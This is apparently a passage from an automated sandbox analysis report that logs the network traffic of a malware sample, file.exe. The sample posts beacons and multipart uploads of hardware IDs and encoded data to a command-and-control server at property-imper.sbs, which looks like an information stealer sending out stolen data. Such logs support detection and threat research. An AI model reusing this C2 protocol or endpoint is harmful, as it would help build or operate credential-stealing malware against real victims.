                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719aa38e8919a1-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1600877&cwnd=118&unsent_bytes=0&cid=18463ebca857d0e4&ts=721&x=0"
                                                                                                                                                                                  2024-11-23 13:46:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                  2024-11-23 13:46:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449731172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:14 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:14 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:14 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=0ph6212n51ff8r7m38fq0aeo8o; expires=Wed, 19-Mar-2025 07:32:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lTiJGoiy8HHLJoSNCgpQkboVVPeMdnIt1ixtx0Z0NeU2tr3TyOatJKWRwcX0a54TY2%2F7f%2FHNPPMVbJPTRiyXm3IBqLPA7TwX7I3MZSQZF4HMg9EySqrZeD3O%2BAYx0gLfmMtiQBw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719ab069546a5f-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1487519&cwnd=180&unsent_bytes=0&cid=17004be29aec3654&ts=729&x=0"
                                                                                                                                                                                  2024-11-23 13:46:14 UTC356INData Raw: 34 64 34 0d 0a 69 31 76 37 65 6e 66 4a 70 63 52 7a 5a 61 43 53 64 4b 68 68 47 43 4c 4e 6e 35 55 68 44 50 56 72 53 5a 55 62 65 4c 75 75 32 43 58 77 65 59 31 59 54 66 32 4a 35 67 41 41 67 71 67 41 32 68 52 39 44 75 2f 2b 38 51 4d 32 6b 77 6f 6c 35 6e 35 55 6d 64 69 31 42 37 45 39 6d 68 59 45 72 49 6e 6d 46 68 32 43 71 43 2f 54 51 33 31 4d 37 36 57 33 52 47 61 58 43 69 58 33 65 68 50 55 33 72 52 47 34 7a 65 63 45 68 4b 71 77 61 55 66 43 4d 58 33 45 63 6b 4c 64 6b 75 67 39 2f 67 44 49 4e 63 4f 4d 37 63 68 57 76 62 4c 72 45 54 47 4f 6f 67 52 56 62 53 4a 76 31 45 41 7a 72 42 4f 69 67 42 39 51 4b 48 35 38 55 70 6b 6e 51 4d 74 39 6e 38 53 79 38 65 2b 54 65 4d 35 6e 78 4d 59 6f 39 57 6f 46 51 2f 4f 38 52 76 4a 51 7a 51 41 71 4f 57 33 47 79 37 45 4f 79 6a 6d 61 41
                                                                                                                                                                                  Data Ascii: 4d4i1v7enfJpcRzZaCSdKhhGCLNn5UhDPVrSZUbeLuu2CXweY1YTf2J5gAAgqgA2hR9Du/+8QM2kwol5n5Umdi1B7E9mhYErInmFh2CqC/TQ31M76W3RGaXCiX3ehPU3rRG4zecEhKqwaUfCMX3EckLdkug9/gDINcOM7chWvbLrETGOogRVbSJv1EAzrBOigB9QKH58UpknQMt9n8Sy8e+TeM5nxMYo9WoFQ/O8RvJQzQAqOW3Gy7EOyjmaA
                                                                                                                                                                                  2024-11-23 13:46:14 UTC887INData Raw: 30 47 51 7a 4a 39 51 54 42 43 6e 64 4e 72 2f 44 39 54 47 32 58 44 69 48 39 64 68 44 64 77 62 64 42 36 54 6e 5a 56 6c 57 73 33 2b 5a 4a 52 2b 48 31 42 73 30 50 62 41 4b 56 76 65 67 4e 64 39 63 4f 4a 37 63 68 57 74 48 4a 75 55 54 69 4e 70 6f 51 48 72 6e 48 74 42 63 4b 78 2b 49 51 7a 77 31 77 51 37 33 33 2b 55 56 74 6e 67 49 69 38 6e 34 65 6d 59 4c 36 51 50 46 35 77 56 67 30 70 73 79 71 47 78 44 43 73 41 6d 45 47 6a 70 48 6f 37 32 76 41 32 71 57 44 53 72 7a 64 78 54 64 77 4c 78 4a 35 44 61 66 45 68 57 73 7a 61 34 5a 42 73 2f 37 47 63 6f 47 64 30 53 70 38 66 5a 47 4c 74 6c 4a 4c 4f 38 35 51 70 6e 69 76 55 54 37 65 36 77 62 47 36 58 41 73 46 45 59 6a 4f 6c 57 7a 51 38 36 47 4f 2f 7a 38 6b 78 38 6c 68 73 75 2b 57 73 57 33 4d 71 33 52 4f 63 35 6e 42 38 59 70 63
                                                                                                                                                                                  Data Ascii: 0GQzJ9QTBCndNr/D9TG2XDiH9dhDdwbdB6TnZVlWs3+ZJR+H1Bs0PbAKVvegNd9cOJ7chWtHJuUTiNpoQHrnHtBcKx+IQzw1wQ733+UVtngIi8n4emYL6QPF5wVg0psyqGxDCsAmEGjpHo72vA2qWDSrzdxTdwLxJ5DafEhWsza4ZBs/7GcoGd0Sp8fZGLtlJLO85QpnivUT7e6wbG6XAsFEYjOlWzQ86GO/z8kx8lhsu+WsW3Mq3ROc5nB8Ypc
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 33 66 39 38 0d 0a 51 2b 51 7a 6d 68 77 52 70 73 69 76 47 41 37 51 2b 68 72 45 45 58 64 4b 71 76 50 37 52 6d 47 58 43 43 72 35 63 78 47 5a 67 76 70 41 38 58 6e 42 57 44 71 6d 31 37 51 62 44 4e 4f 79 49 38 6b 4e 64 45 65 35 76 65 67 4e 64 39 63 4f 4a 37 63 68 57 74 4c 4b 74 6b 76 70 50 34 73 57 47 72 6e 4e 74 42 55 4a 78 76 77 59 77 77 35 31 52 62 33 35 39 31 46 76 6b 67 34 6c 2b 6d 73 66 6d 59 4c 36 51 50 46 35 77 56 67 76 6e 38 43 32 41 41 43 41 78 52 58 45 44 58 31 57 37 2b 4b 35 57 69 36 51 42 57 75 76 4f 52 6e 56 77 62 4e 43 35 69 75 54 46 42 53 35 77 4b 38 59 44 63 50 2b 47 63 45 50 66 31 4b 6b 38 76 39 4d 62 35 6f 45 49 50 4e 35 57 70 65 4d 76 56 2b 70 59 64 6b 35 47 4b 54 56 70 51 42 46 39 2f 4d 59 78 41 52 73 41 4c 43 7a 37 67 4e 70 6d 30 6c 7a 74
                                                                                                                                                                                  Data Ascii: 3f98Q+QzmhwRpsivGA7Q+hrEEXdKqvP7RmGXCCr5cxGZgvpA8XnBWDqm17QbDNOyI8kNdEe5vegNd9cOJ7chWtLKtkvpP4sWGrnNtBUJxvwYww51Rb3591Fvkg4l+msfmYL6QPF5wVgvn8C2AACAxRXEDX1W7+K5Wi6QBWuvORnVwbNC5iuTFBS5wK8YDcP+GcEPf1Kk8v9Mb5oEIPN5WpeMvV+pYdk5GKTVpQBF9/MYxARsALCz7gNpm0lzt
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 4d 75 6b 6e 6c 4d 70 34 54 48 71 2f 44 70 68 77 4d 7a 50 34 66 78 67 74 32 52 37 33 77 38 6b 74 6b 6e 67 77 6e 2b 6e 6f 49 32 73 33 36 43 61 6b 2b 67 56 68 4e 36 2b 43 56 4a 69 53 43 37 31 6a 54 51 33 31 4d 37 36 57 33 51 6d 61 51 42 79 2f 6c 64 77 6a 58 79 37 70 42 34 54 47 65 46 42 75 6c 31 61 34 51 42 38 7a 2f 48 73 4d 48 65 30 53 72 38 66 41 44 49 4e 63 4f 4d 37 63 68 57 76 48 50 6f 46 32 72 46 35 49 59 45 72 76 52 76 56 45 59 6a 4f 6c 57 7a 51 38 36 47 4f 2f 35 2f 45 6c 6e 6c 41 41 76 2b 6e 6b 54 31 73 57 79 53 75 45 72 6d 42 49 48 72 38 4b 6e 48 67 33 47 2b 42 72 46 44 33 35 53 70 4c 32 35 41 32 6d 50 53 58 4f 33 57 52 48 50 37 36 68 56 71 53 62 58 41 56 57 73 79 2b 5a 4a 52 38 76 38 46 38 73 4a 66 45 75 71 38 50 64 47 5a 4a 41 46 4b 2f 64 36 48 4e
                                                                                                                                                                                  Data Ascii: MuknlMp4THq/DphwMzP4fxgt2R73w8ktkngwn+noI2s36Cak+gVhN6+CVJiSC71jTQ31M76W3QmaQBy/ldwjXy7pB4TGeFBul1a4QB8z/HsMHe0Sr8fADINcOM7chWvHPoF2rF5IYErvRvVEYjOlWzQ86GO/5/ElnlAAv+nkT1sWySuErmBIHr8KnHg3G+BrFD35SpL25A2mPSXO3WRHP76hVqSbXAVWsy+ZJR8v8F8sJfEuq8PdGZJAFK/d6HN
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 34 7a 43 52 47 42 71 75 7a 36 30 58 43 63 50 32 47 73 64 44 4e 41 43 6f 35 62 63 62 4c 72 41 54 4a 76 46 75 43 2b 7a 4c 75 68 61 70 4a 74 63 42 56 61 7a 4c 35 6b 6c 48 7a 2f 77 63 78 77 5a 2b 53 4b 6a 2b 39 6b 39 71 6d 67 51 76 2f 6e 30 66 79 39 36 38 53 65 6b 32 6c 78 63 5a 75 63 6d 6a 45 51 75 43 76 6c 62 4e 47 7a 6f 59 37 38 7a 67 51 79 36 49 52 7a 4b 33 66 68 61 5a 6c 50 70 49 35 43 75 56 46 78 57 71 78 4b 49 61 41 4d 54 32 46 38 6b 47 65 55 57 70 2f 50 64 50 5a 4a 41 42 49 66 6c 30 48 4e 33 4b 76 41 65 6e 65 5a 34 41 56 66 4f 48 6c 42 77 4a 79 2f 4d 51 78 78 56 53 63 65 2f 69 75 56 6f 75 6b 41 56 72 72 7a 6b 65 30 73 53 32 51 75 45 38 6d 42 41 66 6f 38 69 70 41 77 62 4e 2b 52 48 42 44 6e 56 4f 71 76 50 6c 52 47 57 63 41 53 4c 35 66 31 71 58 6a 4c 31
                                                                                                                                                                                  Data Ascii: 4zCRGBquz60XCcP2GsdDNACo5bcbLrATJvFuC+zLuhapJtcBVazL5klHz/wcxwZ+SKj+9k9qmgQv/n0fy968Sek2lxcZucmjEQuCvlbNGzoY78zgQy6IRzK3fhaZlPpI5CuVFxWqxKIaAMT2F8kGeUWp/PdPZJABIfl0HN3KvAeneZ4AVfOHlBwJy/MQxxVSce/iuVoukAVrrzke0sS2QuE8mBAfo8ipAwbN+RHBDnVOqvPlRGWcASL5f1qXjL1
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 78 34 56 6f 4d 2b 68 47 51 50 4d 34 68 66 46 51 7a 51 41 71 4f 57 33 47 79 36 6d 48 79 7a 77 64 6c 6a 77 79 36 46 47 34 7a 71 53 46 46 57 30 69 62 39 52 41 4d 36 77 54 6f 6f 4f 64 6b 32 72 37 2f 74 44 62 70 34 4f 49 65 56 32 46 64 54 50 75 6b 4c 37 4f 49 73 58 48 71 37 45 6f 68 34 49 7a 76 67 63 69 6b 30 36 52 37 65 39 72 77 4e 43 6c 42 67 68 74 56 34 41 7a 38 75 32 56 75 49 30 6c 56 67 4b 35 64 37 6d 46 67 75 43 71 46 62 4b 41 6e 64 53 71 76 7a 39 53 57 4f 66 42 69 37 79 64 68 37 64 78 37 52 56 35 7a 61 5a 48 68 36 71 77 71 55 61 44 63 7a 35 42 49 70 4e 4f 6b 65 33 76 61 38 44 52 49 77 49 4a 76 73 37 4e 4e 4c 61 76 51 58 49 4e 35 49 66 47 62 32 48 75 56 38 65 67 76 63 61 69 6c 73 36 53 61 48 78 39 45 52 6d 6e 77 77 72 2f 48 6b 56 30 38 4b 39 56 65 4d 31
                                                                                                                                                                                  Data Ascii: x4VoM+hGQPM4hfFQzQAqOW3Gy6mHyzwdljwy6FG4zqSFFW0ib9RAM6wTooOdk2r7/tDbp4OIeV2FdTPukL7OIsXHq7Eoh4Izvgcik06R7e9rwNClBghtV4Az8u2VuI0lVgK5d7mFguCqFbKAndSqvz9SWOfBi7ydh7dx7RV5zaZHh6qwqUaDcz5BIpNOke3va8DRIwIJvs7NNLavQXIN5IfGb2HuV8egvcails6SaHx9ERmnwwr/HkV08K9VeM1
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 37 41 74 6c 45 59 6a 4f 6c 57 7a 51 38 36 47 4f 2f 39 38 30 39 74 6b 41 63 6b 2b 6e 59 64 30 73 4f 77 53 66 73 32 6e 42 41 5a 6f 38 71 30 47 77 33 51 2b 52 2f 48 44 58 4a 53 72 4c 32 35 41 32 6d 50 53 58 4f 33 53 78 44 61 77 4b 78 4b 35 6e 6d 47 56 67 7a 72 77 4b 70 52 58 34 4c 69 42 4d 6f 49 65 6b 65 68 37 2f 5a 4c 59 5a 30 4a 4c 66 78 7a 47 64 44 49 74 45 37 76 4f 4a 51 5a 46 4b 76 43 70 68 67 56 7a 37 42 59 69 67 52 69 41 50 65 39 77 45 39 6c 70 67 6f 39 74 32 5a 55 77 49 79 39 53 36 6c 68 32 52 6b 48 70 73 2b 69 45 51 72 45 2b 78 66 4c 41 48 70 41 72 50 33 79 53 47 47 52 44 69 62 39 63 42 50 4c 78 4c 35 56 36 54 57 64 57 46 76 72 77 4c 35 52 58 34 4c 41 46 63 45 50 65 6b 32 36 76 65 67 4e 64 39 63 4f 4a 37 63 68 57 74 48 48 73 55 48 69 4f 70 6f 57 48
                                                                                                                                                                                  Data Ascii: 7AtlEYjOlWzQ86GO/9809tkAck+nYd0sOwSfs2nBAZo8q0Gw3Q+R/HDXJSrL25A2mPSXO3SxDawKxK5nmGVgzrwKpRX4LiBMoIekeh7/ZLYZ0JLfxzGdDItE7vOJQZFKvCphgVz7BYigRiAPe9wE9lpgo9t2ZUwIy9S6lh2RkHps+iEQrE+xfLAHpArP3ySGGRDib9cBPLxL5V6TWdWFvrwL5RX4LAFcEPek26vegNd9cOJ7chWtHHsUHiOpoWH
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 41 53 75 4c 37 41 4d 73 4f 63 55 7a 74 2f 50 70 54 61 64 64 48 61 2f 45 35 51 6f 6d 43 2b 6b 50 34 65 63 46 49 52 2f 43 53 39 55 5a 58 6b 4f 39 59 30 30 4e 73 41 50 65 76 75 51 4e 38 31 31 46 72 73 48 6f 49 79 38 71 35 55 65 70 2b 70 79 59 31 6f 4d 75 6c 48 51 62 46 73 46 69 4b 44 44 6f 59 6c 72 33 30 55 58 7a 59 47 44 33 36 61 52 32 56 78 4b 74 4b 35 58 6e 58 57 46 6d 76 7a 4b 6f 55 41 4e 4b 2f 42 4e 6f 49 64 6c 62 6a 2b 65 55 44 49 4e 63 59 49 50 68 72 46 4e 36 44 71 31 48 6b 4b 5a 6f 64 45 75 66 50 74 78 77 4c 67 72 35 57 33 77 68 32 52 71 4c 6f 75 46 4a 34 6c 42 38 73 75 33 45 4c 31 4d 44 36 65 4b 64 35 67 56 68 4e 36 2f 4b 6c 48 77 6e 46 35 67 65 48 49 33 46 4d 72 50 48 32 52 43 37 5a 53 53 32 33 49 55 6d 58 6a 4c 35 57 71 57 48 4a 53 6b 37 2b 6c 50
                                                                                                                                                                                  Data Ascii: ASuL7AMsOcUzt/PpTaddHa/E5QomC+kP4ecFIR/CS9UZXkO9Y00NsAPevuQN811FrsHoIy8q5Uep+pyY1oMulHQbFsFiKDDoYlr30UXzYGD36aR2VxKtK5XnXWFmvzKoUANK/BNoIdlbj+eUDINcYIPhrFN6Dq1HkKZodEufPtxwLgr5W3wh2RqLouFJ4lB8su3EL1MD6eKd5gVhN6/KlHwnF5geHI3FMrPH2RC7ZSS23IUmXjL5WqWHJSk7+lP
                                                                                                                                                                                  2024-11-23 13:46:14 UTC1369INData Raw: 37 31 6a 54 51 32 77 41 39 36 36 35 41 33 7a 58 55 57 75 77 64 78 66 59 7a 37 52 45 2b 79 75 66 47 77 4f 6f 67 4a 67 76 49 73 2f 39 45 38 51 45 52 48 36 4f 39 2b 64 4f 59 5a 41 33 46 63 42 6f 48 63 6d 4f 6e 45 54 2f 4f 74 6c 57 56 62 4f 48 2f 6c 45 6d 79 4f 41 62 78 51 51 36 44 75 2f 35 74 78 73 75 73 67 51 6d 38 6e 63 64 6d 2b 32 77 56 2b 51 32 6e 6c 68 62 36 38 76 6d 53 55 66 44 2b 67 62 48 44 48 30 4d 71 4f 66 77 41 79 44 58 42 32 75 76 4f 52 76 54 33 4c 64 49 37 6e 57 66 46 68 76 72 32 4f 67 49 52 39 53 77 54 70 6c 4e 4f 6c 4c 76 70 62 63 45 59 4a 6f 49 4b 50 6c 36 43 4d 76 4b 75 56 48 71 66 71 63 6d 4d 4b 62 4b 6f 78 38 41 2f 4d 34 33 77 42 4e 33 54 36 69 2f 31 30 52 34 6c 44 63 56 77 47 67 64 79 59 36 63 52 50 38 36 32 56 5a 56 73 34 66 2b 55 53 62
                                                                                                                                                                                  Data Ascii: 71jTQ2wA9665A3zXUWuwdxfYz7RE+yufGwOogJgvIs/9E8QERH6O9+dOYZA3FcBoHcmOnET/OtlWVbOH/lEmyOAbxQQ6Du/5txsusgQm8ncdm+2wV+Q2nlhb68vmSUfD+gbHDH0MqOfwAyDXB2uvORvT3LdI7nWfFhvr2OgIR9SwTplNOlLvpbcEYJoIKPl6CMvKuVHqfqcmMKbKox8A/M43wBN3T6i/10R4lDcVwGgdyY6cRP862VZVs4f+USb


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.449732172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:16 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=FH4EEH98VITN2ILE
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 18157
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:16 UTC15331OUTData Raw: 2d 2d 46 48 34 45 45 48 39 38 56 49 54 4e 32 49 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 33 30 32 42 35 39 31 39 38 31 39 41 42 37 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 46 48 34 45 45 48 39 38 56 49 54 4e 32 49 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 48 34 45 45 48 39 38 56 49 54 4e 32 49 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                  Data Ascii: --FH4EEH98VITN2ILEContent-Disposition: form-data; name="hwid"52302B5919819AB7D7CBBD6DF28D3732--FH4EEH98VITN2ILEContent-Disposition: form-data; name="pid"2--FH4EEH98VITN2ILEContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                  2024-11-23 13:46:16 UTC2826OUTData Raw: 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36
                                                                                                                                                                                  Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                                                                  2024-11-23 13:46:17 UTC1026INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:17 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=tsp033qs95ra104k86ldt0o19e; expires=Wed, 19-Mar-2025 07:32:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZLmxtc7iVPq8xjcT3q%2BhPgLyIBw4pE7Y83BqyXBc%2Bwr4v9xnyulapTSSwk6OH%2BE%2BwjXBEjXrKQcqlgJQ%2BmfvFkVRO8kEIcu5sr8%2FgDPUR7g%2FqO6ejjIvvPRWrrh069iCuIsoUM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719abffdd2c3f5-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1509&sent=15&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19119&delivery_rate=1801357&cwnd=219&unsent_bytes=0&cid=287ae19caa274e6a&ts=1077&x=0"
                                                                                                                                                                                  2024-11-23 13:46:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 13:46:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.449733172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:19 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=7S1WQZGWM46MB6R
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 8772
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:19 UTC8772OUTData Raw: 2d 2d 37 53 31 57 51 5a 47 57 4d 34 36 4d 42 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 33 30 32 42 35 39 31 39 38 31 39 41 42 37 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 37 53 31 57 51 5a 47 57 4d 34 36 4d 42 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 53 31 57 51 5a 47 57 4d 34 36 4d 42 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                  Data Ascii: --7S1WQZGWM46MB6RContent-Disposition: form-data; name="hwid"52302B5919819AB7D7CBBD6DF28D3732--7S1WQZGWM46MB6RContent-Disposition: form-data; name="pid"2--7S1WQZGWM46MB6RContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                  2024-11-23 13:46:20 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:19 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=mq6qjgidg7nbqv870eo096phn9; expires=Wed, 19-Mar-2025 07:32:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MnOK75NMIOIUYy38VdBoiuCHJgmxtOnGunRJBzks6IU8YdXhG5CCm806Qzh%2Buz4T3uk%2BRv%2BLA8iLtyzusV1AZ3PQYmQoBka%2F%2B02Y1L1OMcrMr1zHSyLlFCvNNiWYFvenYF2BKg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719acf78170cc0-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1607&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9710&delivery_rate=1771844&cwnd=214&unsent_bytes=0&cid=60a18d1394f30f91&ts=894&x=0"
                                                                                                                                                                                  2024-11-23 13:46:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 13:46:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
